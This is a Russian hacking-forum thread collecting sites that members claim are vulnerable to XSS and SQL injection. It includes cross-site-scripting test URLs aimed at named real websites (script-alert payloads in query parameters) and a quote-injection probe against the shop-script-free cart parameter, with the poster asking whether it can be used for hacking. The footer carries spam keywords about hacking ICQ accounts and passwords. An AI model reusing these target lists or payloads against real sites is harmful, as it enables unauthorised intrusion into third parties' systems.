Старый 03.11.2010, 19:15   #1
Мустанг92
RAM 128MB
 
Аватар для Мустанг92
 
Регистрация: 01.11.2010
Сообщений: 142
Мустанг92 на пути к лучшему
Мустанг92 вне форума

По умолчанию Маленький сборник уязвимостей


Xss
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
Derevo2.ru
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
Cuctema.ru
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
Sql
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
Derevo2.ru
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
Я нашел давно уязвимости эти,надеюсь хоть пару штук активны.
  Ответить с цитированием
Ответ: Маленький сборник уязвимостей
Старый 05.11.2010, 22:09   #2
Spam
RAM 256MB
 
Аватар для Spam
 
Регистрация: 22.07.2009
Сообщений: 391
Spam - это имя известно всемSpam - это имя известно всемSpam - это имя известно всемSpam - это имя известно всемSpam - это имя известно всемSpam - это имя известно всем
Spam вне форума
По умолчанию Ответ: Маленький сборник уязвимостей

Я бы это к xss отнес)
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
__________________
Хакер — не преступник. Взлом для искусства. Смысл — в свободе.
  Ответить с цитированием
Ответ: Маленький сборник уязвимостей
Старый 15.11.2010, 23:01   #3
KENT
RAM 16MB
 
Аватар для KENT
 
Регистрация: 13.07.2009
Сообщений: 30
KENT скоро придёт к известности
KENT вне форума
По умолчанию Ответ: Маленький сборник уязвимостей

hTTp://www.ssangyong.by/ru/pages/index.php?id=<script>alert(1)</script>
hTTp://www.mibf.ru/index.php?PHPSESSID=e7884656fb9ccd092c8c9e02214d21 7c&id=49&search_query=<script>alert(1)</script>
вот парачка
  Ответить с цитированием
Ответ: Маленький сборник уязвимостей
Старый 18.12.2010, 14:50   #4
Mr.John
RAM 8MB
 
Аватар для Mr.John
 
Регистрация: 13.12.2010
Сообщений: 13
Mr.John Новичок
Mr.John вне форума
По умолчанию Ответ: Маленький сборник уязвимостей

Спасибо.. Нужно тоже поискать
  Ответить с цитированием
Ответ: Маленький сборник уязвимостей
Старый 19.10.2011, 20:06   #5
Мустанг92
RAM 128MB
 
Аватар для Мустанг92
 
Регистрация: 01.11.2010
Сообщений: 142
Мустанг92 на пути к лучшему
Мустанг92 вне форума
По умолчанию Ответ: Маленький сборник уязвимостей

[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]'

[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
__________________
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
Ёма!!!
  Ответить с цитированием
Ответ: Маленький сборник уязвимостей
Старый 24.03.2012, 15:09   #6
Мустанг92
RAM 128MB
 
Аватар для Мустанг92
 
Регистрация: 01.11.2010
Сообщений: 142
Мустанг92 на пути к лучшему
Мустанг92 вне форума
По умолчанию Ответ: Маленький сборник уязвимостей

есть уязвимость в бесплатном движке онлайн магазина shop-script-free. само содержание следующее:
index.php?shopping_cart=yes&add2cart=6941337<a>%22 %27&PHPSESSID=1a2b855c2f76c7090c3f7289bb69352c
на данный момент просто хочу знать - "возможно ли раскрутить далее такую дырку?! и дырка ли это вообще?!". т.к. сам ламер в этом деле, хочу попросить более продвинутых людей проверить вышенаписанную дырку. еще раз напишу - "возможно ли данную дырку применить для взлома?!"
__________________
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
Ёма!!!
  Ответить с цитированием
Ответ: Маленький сборник уязвимостей
Старый 24.03.2012, 16:00   #7
surpriz
RAM 256MB
 
Аватар для surpriz
 
Регистрация: 10.01.2011
Сообщений: 1,013
surpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личность
surpriz вне форума
По умолчанию Ответ: Маленький сборник уязвимостей

Цитата:
Сообщение от Мустанг92 Посмотреть сообщение
есть уязвимость в бесплатном движке онлайн магазина shop-script-free. само содержание следующее:
index.php?shopping_cart=yes&add2cart=6941337<a>%22 %27&PHPSESSID=1a2b855c2f76c7090c3f7289bb69352c
на данный момент просто хочу знать - "возможно ли раскрутить далее такую дырку?! и дырка ли это вообще?!". т.к. сам ламер в этом деле, хочу попросить более продвинутых людей проверить вышенаписанную дырку. еще раз напишу - "возможно ли данную дырку применить для взлома?!"
линк в студию..
  Ответить с цитированием
Ответ: Маленький сборник уязвимостей
Старый 24.03.2012, 16:12   #8
mironich
RAM 256MB
 
Аватар для mironich
 
Регистрация: 22.11.2010
Сообщений: 2,026
mironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личность
mironich вне форума
По умолчанию Ответ: Маленький сборник уязвимостей

Цитата:
index.php?shopping_cart=yes&add2cart=6941337<a>%22 %27&PHPSESSID=1a2b855c2f76c7090c3f7289bb69352c
И де тут дырка?
Передать мусор в пост запрос любой может, скачал я сорцы шопа, на первый взгляд все зделано на совесть.
Я про файл index.php больше не смотрел..
  Ответить с цитированием
Ответ: Маленький сборник уязвимостей
Старый 24.03.2012, 16:20   #9
Мустанг92
RAM 128MB
 
Аватар для Мустанг92
 
Регистрация: 01.11.2010
Сообщений: 142
Мустанг92 на пути к лучшему
Мустанг92 вне форума
По умолчанию Ответ: Маленький сборник уязвимостей

Цитата:
Сообщение от mironich Посмотреть сообщение
И де тут дырка?
Передать мусор в пост запрос любой может, скачал я сорцы шопа, на первый взгляд все зделано на совесть.
Я про файл index.php больше не смотрел..
можно так(чтоб смотрелось лучше):
index.php?shopping_cart=yes&add2cart=1%27
__________________
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
Ёма!!!
  Ответить с цитированием
Ответ: Маленький сборник уязвимостей
Старый 24.03.2012, 16:23   #10
surpriz
RAM 256MB
 
Аватар для surpriz
 
Регистрация: 10.01.2011
Сообщений: 1,013
surpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личность
surpriz вне форума
По умолчанию Ответ: Маленький сборник уязвимостей

Цитата:
Сообщение от Мустанг92 Посмотреть сообщение
можно так(чтоб смотрелось лучше):
index.php?shopping_cart=yes&add2cart=1%27
ты можешь кинуть линк на сайт??
  Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



взломать аську аську взломать взлом программы сделать взлом программы как сделать взлом программы хакерские сайты как легко взломать аську лучшие хакерские сайты топ список хакерские сайты взлом паролей легкий взлом паролей

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. Перевод: zCarot